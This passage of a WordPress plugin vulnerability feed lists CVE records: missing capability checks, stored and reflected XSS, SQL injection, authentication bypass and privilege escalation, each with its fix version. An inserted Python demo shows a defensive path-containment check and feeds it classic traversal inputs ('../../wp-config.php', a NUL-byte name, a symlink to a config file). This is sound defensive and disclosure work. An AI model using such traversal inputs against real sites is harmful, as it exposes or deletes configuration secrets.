hp\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-nav-menu-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-nav-menu-settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-widgets.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-widgets.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9706","slug":"ultimate-coming-soon","versionImpact":"1.0.9","versionEndExcluding":"1.1.0","description":"The Ultimate Coming Soon & Maintenance plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ucsm_activate_lite_template_lite function in all versions up to, and including, 1.0.9. This makes it possible for unauthenticated attackers to change the template used for the coming soon \/ maintenance page.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-coming-soon\\\/trunk\\\/backend\\\/tabs-content\\\/templates\\\/frontend-part\\\/display-template.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-coming-soon\\\/trunk\\\/backend\\\/tabs-content\\\/templates\\\/frontend-part\\\/display-template.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a535eb7f-5ec7-4b3b-b46f-4f09434d04b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a535eb7f-5ec7-4b3b-b46f-4f09434d04b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9705","slug":"ultimate-coming-soon","versionImpact":"1.0.9","versionEndExcluding":"1.1.0","description":"The Ultimate Coming Soon & Maintenance plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ucsm_update_template_name_lite' function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the name of the plugin's templates.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-coming-soon\\\/trunk\\\/backend\\\/tabs-content\\\/templates\\\/frontend-part\\\/display-template.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-coming-soon\\\/trunk\\\/backend\\\/tabs-content\\\/templates\\\/frontend-part\\\/display-template.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bef108a-2c68-4347-bf53-559b2d877f6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bef108a-2c68-4347-bf53-559b2d877f6b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12287","slug":"biagiotti-membership","versionImpact":"1.0.2","versionEndExcluding":"1.1","description":"The Biagiotti Membership plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.0.2. This is due to the plugin not properly verifying a user's identity prior to authenticating them. This makes it possible for unauthenticated attackers to log in as other users, such as administrators, granted they have access to an email.","recommendation":"Update to version 1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/biagiotti-beauty-and-cosmetics-shop\\\/24645919\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/biagiotti-beauty-and-cosmetics-shop\\\/24645919\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12f319df-41eb-484a-8fca-af6ae76f4179?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12f319df-41eb-484a-8fca-af6ae76f4179?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2635","slug":"accessibility-help-button","versionEndExcluding":"1.1","description":"The Call Now Accessibility Button WordPress plugin before 1.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81b89613-18d0-4c13-84e3-9e2e1802fd7c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81b89613-18d0-4c13-84e3-9e2e1802fd7c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1564","slug":"setsail-membership","versionImpact":"1.0.3","versionEndExcluding":"1.1","description":"The SetSail Membership plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.0.3. This is due to the plugin not properly verifying a user's identity through the social login. This makes it possible for unauthenticated attackers to log in as any user, including administrators, and take over access to their account.","recommendation":"Update to version 1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/setsail-travel-agency-theme\\\/22832625\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/setsail-travel-agency-theme\\\/22832625\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2c2385e-0d1e-435a-9b82-972964084148?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2c2385e-0d1e-435a-9b82-972964084148?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11885","slug":"ninjateam-telegram","versionImpact":"1.0","versionEndExcluding":"1.1","description":"The NinjaTeam Chat for Telegram plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'njtele_button' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209678%40ninjateam-telegram&new=3209678%40ninjateam-telegram\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209678%40ninjateam-telegram&new=3209678%40ninjateam-telegram\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/338d9348-da24-44b9-ac97-a7a8a7376815?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/338d9348-da24-44b9-ac97-a7a8a7376815?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3344","slug":"auto-location-for-wp-job-manager","versionEndExcluding":"1.1","description":"The Auto Location for WP Job Manager via Google WordPress plugin before 1.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d27bc628-3de1-421e-8a67-150e9d7a96dd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d27bc628-3de1-421e-8a67-150e9d7a96dd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3278","slug":"urbango-membership","versionImpact":"1.0.4","versionEndExcluding":"1.1","description":"The UrbanGo Membership plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.0.4. This is due to the plugin allowing users who are registering new accounts to set their own role by supplying the 'user_register_role' field. This makes it possible for unauthenticated attackers to gain elevated privileges by creating an account with the administrator role.","recommendation":"Update to version 1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/urbango-directory-and-listing-wordpress-theme\\\/22712624\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/urbango-directory-and-listing-wordpress-theme\\\/22712624\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/913ffe0c-c8f8-4cda-be9a-96c056d4c4a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/913ffe0c-c8f8-4cda-be9a-96c056d4c4a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10016","slug":"simple-download-button-shortcode","versionImpact":"1.0","versionEndExcluding":"1.1","description":"A vulnerability classified as problematic has been found in the Halulu simple-download-button-shortcode plugin 1.0 for WordPress. Affected is an unknown function of the file simple-download-button_dl.php in the Download Handler component. Manipulation of the 'file' argument leads to information disclosure. The attack can be launched remotely. Upgrading to version 1.1 addresses this issue; the patch is commit e648a8706818297cf02a665ae0bae1c069dea5f1. VDB-242190 is the identifier assigned to this vulnerability.","recommendation":"Update to version 1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.242190\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.242190\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/simple-download-button-shortcode\\\/commit\\\/e648a8706818297cf02a665ae0bae1c069dea5f1\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/simple-download-button-shortcode\\\/commit\\\/e648a8706818297cf02a665ae0bae1c069dea5f1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.242190\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.242190\",\"refsource\":\"MISC\",\"tags\":[]}]"}
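Two records on this page describe a user-supplied file name reaching the filesystem unchecked: CVE-2024-11615 (arbitrary file deletion through 'zetra_deleteLanguageFile' and 'zetra_deleteFontsFile', "not properly validating a file or its path prior to deleting it") and CVE-2012-10016 just above (the download handler's 'file' argument leading to information disclosure). Both come down to the same missing containment check, so the following is one added example of mine for both, not code from either plugin: the name is resolved to a real path and must land inside the directory the handler is meant to serve. The directory layout, file names and the .json/.po/.mo allowlist are constructed for the demo. What is deliberately not shown, because it is WordPress-specific, is the authorization the same handlers also lacked: both records say "unauthenticated attackers", so a capability check and nonce belong in front of this check, not instead of it.

```python
import tempfile
from pathlib import Path

# What a language-file handler legitimately touches; a constructed choice for the demo.
ALLOWED_SUFFIXES = {".json", ".po", ".mo"}


class UnsafePath(ValueError):
    """A user-supplied name does not resolve to an allowed file under the base directory."""


def safe_join(base_dir, user_name, allowed_suffixes=ALLOWED_SUFFIXES):
    """Resolve user_name inside base_dir or raise UnsafePath.

    Rejects, in order: NUL bytes (C-level file APIs would truncate the name there),
    anything that resolves outside base_dir (absolute names, '..' segments and symlinks
    are all caught by resolving to a real path and testing containment), and extensions
    outside the allowlist.
    """
    if "\x00" in user_name:
        raise UnsafePath("NUL byte in file name")
    base = Path(base_dir).resolve()
    # Path('/base') / '/etc/passwd' is '/etc/passwd': an absolute name discards base and
    # is then rejected by the containment test.
    candidate = (base / user_name).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise UnsafePath("%r resolves outside %s" % (user_name, base)) from None
    if candidate.suffix.lower() not in allowed_suffixes:
        raise UnsafePath("%r has a disallowed extension" % user_name)
    return candidate


def read_download(base_dir, user_name):
    """A download handler that only serves files passing safe_join."""
    return safe_join(base_dir, user_name).read_bytes()


def delete_language_file(base_dir, user_name):
    """A delete handler that only unlinks files passing safe_join."""
    safe_join(base_dir, user_name).unlink()


def run_demo():
    """Build a throwaway layout, push the classic traversal inputs through safe_join and
    report how each was treated, keyed by a label so the result is stable across hosts."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        base = root / "uploads" / "languages"
        base.mkdir(parents=True)
        (base / "fr_FR.json").write_text("{}")
        (root / "wp-config.php").write_text("define('DB_PASSWORD', 'hunter2');")  # the target
        cases = [
            ("plain", "fr_FR.json"),
            ("dotdot", "../../wp-config.php"),
            ("absolute", str(root / "wp-config.php")),
            ("nul", "fr_FR.json\x00.php"),
            ("dotdot_back_inside", "../languages/fr_FR.json"),  # '..' that stays inside base
            ("bad_ext", "notes.php"),
        ]
        try:
            (base / "link.json").symlink_to(root / "wp-config.php")
            cases.append(("symlink", "link.json"))
        except OSError:
            pass  # host forbids symlinks; that case is simply not exercised
        results = {}
        for label, name in cases:
            try:
                results[label] = str(safe_join(base, name).relative_to(base))
            except UnsafePath as exc:
                results[label] = "rejected: %s" % exc
        results["download_plain"] = read_download(base, "fr_FR.json")
        delete_language_file(base, "fr_FR.json")
        results["deleted_plain"] = not (base / "fr_FR.json").exists()
        return results


if __name__ == "__main__":
    for label, outcome in run_demo().items():
        print("%-20s %s" % (label, outcome))
```

The containment test is done on the resolved path rather than by searching the string for "..": that is why "../languages/fr_FR.json" is accepted (it resolves back inside the base directory) while a symlink with an innocent name pointing at wp-config.php is rejected. The extension allowlist is a second, independent layer for the case where an attacker can also create files under the base directory.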
{"CVE_ID":"CVE-2024-12446","slug":"post-to-pdf","versionImpact":"1.0","versionEndExcluding":"1.1","description":"The Post to Pdf plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gmptp_single_post' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207671%40post-to-pdf&new=3207671%40post-to-pdf&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207671%40post-to-pdf&new=3207671%40post-to-pdf&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2774e66c-2920-4578-9ab8-20d7dfd6bd6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2774e66c-2920-4578-9ab8-20d7dfd6bd6d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4825","slug":"wp-showhide","versionEndExcluding":"1.05","description":"The WP-ShowHide WordPress plugin before 1.05 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2758983-d3a7-4718-b5b8-30169df6780a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2758983-d3a7-4718-b5b8-30169df6780a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9598","slug":"accelerated-mobile-pages","versionImpact":"1.0.99.1","versionEndExcluding":"1.0.99.2","description":"The AMP for WP \u2013 Accelerated Mobile Pages plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.99.1. This is due to missing or incorrect nonce validation on the 'proxy' function. This makes it possible for unauthenticated attackers to send the logged in user's cookies to their own server via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.99.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b155ec8-d69d-40cf-8bea-201629bc9ca6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b155ec8-d69d-40cf-8bea-201629bc9ca6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.98\\\/includes\\\/options\\\/redux-core\\\/inc\\\/class.p.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.98\\\/includes\\\/options\\\/redux-core\\\/inc\\\/class.p.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174071\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174071\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1484","slug":"ameliabooking","versionImpact":"1.0.98","versionEndExcluding":"1.0.99","description":"The Booking for Appointments and Events Calendar \u2013 Amelia plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the date parameters in all versions up to, and including, 1.0.98 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.99, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a849ef2-ad0a-45ea-8827-9a7233b1ca30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a849ef2-ad0a-45ea-8827-9a7233b1ca30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041769%40ameliabooking%2Ftrunk&old=3037721%40ameliabooking%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041769%40ameliabooking%2Ftrunk&old=3037721%40ameliabooking%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3105","slug":"vehica-core","versionImpact":"1.0.97","versionEndExcluding":"1.0.98","description":"The Vehica Core plugin for WordPress, used by the Vehica - Car Dealer & Listing WordPress Theme, is vulnerable to privilege escalation in all versions up to, and including, 1.0.97. This is due to the plugin not properly validating user meta fields prior to updating them in the database. This makes it possible for authenticated attackers, with Subscriber-level access and above, to escalate their privileges to Administrator.","recommendation":"Update to version 1.0.98, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/support.vehica.com\\\/support\\\/solutions\\\/articles\\\/101000393710\",\"name\":\"https:\\\/\\\/support.vehica.com\\\/support\\\/solutions\\\/articles\\\/101000393710\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b787d6f-d002-4f09-8336-ebb91321e20b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b787d6f-d002-4f09-8336-ebb91321e20b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6808","slug":"ameliabooking","versionImpact":"1.0.93","versionEndExcluding":"1.0.94","description":"The Booking for Appointments and Events Calendar \u2013 Amelia plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.0.93 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.94, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aafb5402-3553-4c89-86e0-4dd556d86074?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aafb5402-3553-4c89-86e0-4dd556d86074?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/ameliabooking\\\/trunk\\\/view\\\/frontend\\\/events.inc.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/ameliabooking\\\/trunk\\\/view\\\/frontend\\\/events.inc.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3015149\\\/ameliabooking\\\/trunk\\\/view\\\/frontend\\\/events.inc.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3015149\\\/ameliabooking\\\/trunk\\\/view\\\/frontend\\\/events.inc.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4693","slug":"user-verification","versionEndExcluding":"1.0.94","description":"The User Verification WordPress plugin before 1.0.94 was affected by an Auth Bypass security vulnerability. To bypass authentication, we only need to know the user\u2019s username. Depending on whose username we know, which can be easily queried because it is usually public data, we may even be given an administrative role on the website.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1eee10a8-135f-4b76-8289-c381ff1f51ea\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1eee10a8-135f-4b76-8289-c381ff1f51ea\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/eeabe1d3-6f64-400a-8fb2-0865efdf6957\",\"name\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/eeabe1d3-6f64-400a-8fb2-0865efdf6957\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0587","slug":"accelerated-mobile-pages","versionImpact":"1.0.92.1","versionEndExcluding":"1.0.93","description":"The AMP for WP \u2013 Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'disqus_name' parameter in all versions up to, and including, 1.0.92.1 due to insufficient input sanitization and output escaping on the executed JS file. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.93, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85ca96a6-7992-424b-8b88-9a0751925223?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85ca96a6-7992-424b-8b88-9a0751925223?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024147\\\/accelerated-mobile-pages\\\/trunk\\\/includes\\\/disqus.html\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024147\\\/accelerated-mobile-pages\\\/trunk\\\/includes\\\/disqus.html\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6782","slug":"accelerated-mobile-pages","versionImpact":"1.0.92","versionEndExcluding":"1.0.92.1","description":"The AMP for WP \u2013 Accelerated Mobile Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.0.92 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.92.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1cae64e-caed-43c0-9a75-9aa4234946a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1cae64e-caed-43c0-9a75-9aa4234946a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/accelerated-mobile-pages\\\/trunk\\\/templates\\\/features.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/accelerated-mobile-pages\\\/trunk\\\/templates\\\/features.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010797%40accelerated-mobile-pages%2Ftrunk&old=2998126%40accelerated-mobile-pages%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010797%40accelerated-mobile-pages%2Ftrunk&old=2998126%40accelerated-mobile-pages%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1890","slug":"tablesome","versionEndExcluding":"1.0.9","description":"The Tablesome WordPress plugin before 1.0.9 does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ef64490-30cd-4e07-9b7c-64f551944f3d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ef64490-30cd-4e07-9b7c-64f551944f3d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1462","slug":"maintenance-page","versionImpact":"1.0.8","versionEndExcluding":"1.0.9","description":"The Maintenance Page plugin for WordPress is vulnerable to Basic Information Exposure in all versions up to, and including, 1.0.8 via the REST API. This makes it possible for unauthenticated attackers to view post titles and content when the site is in maintenance mode.","recommendation":"Update to version 1.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/653bf021-370d-4787-9ded-c5c915aed1d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/653bf021-370d-4787-9ded-c5c915aed1d6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0154","slug":"gamipress-vimeo-integration","versionEndExcluding":"1.0.9","description":"The GamiPress WordPress plugin before 1.0.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e66e173-776d-4423-b4a2-eb7316b2502f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e66e173-776d-4423-b4a2-eb7316b2502f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5203","slug":"activitytime","versionImpact":"1.0.8","versionEndExcluding":"1.0.9","description":"The WP Sessions Time Monitoring Full Automatic WordPress plugin before 1.0.9 does not sanitize the request URL or query parameters before using them in an SQL query, allowing unauthenticated attackers to extract sensitive data from the database via blind time based SQL injection techniques, or in some cases an error\/union based technique.","recommendation":"Update to version 1.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f4f505b-2667-4e0f-9841-9c1cd0831932\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f4f505b-2667-4e0f-9841-9c1cd0831932\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8483","slug":"mas-static-content","versionImpact":"1.0.8","versionEndExcluding":"1.0.9","description":"The MAS Static Content plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.8 via the static_content() function. This makes it possible for authenticated attackers, with contributor-level access and above, to extract potentially sensitive information from private static content pages.","recommendation":"Update to version 1.0.9, or a newer patched 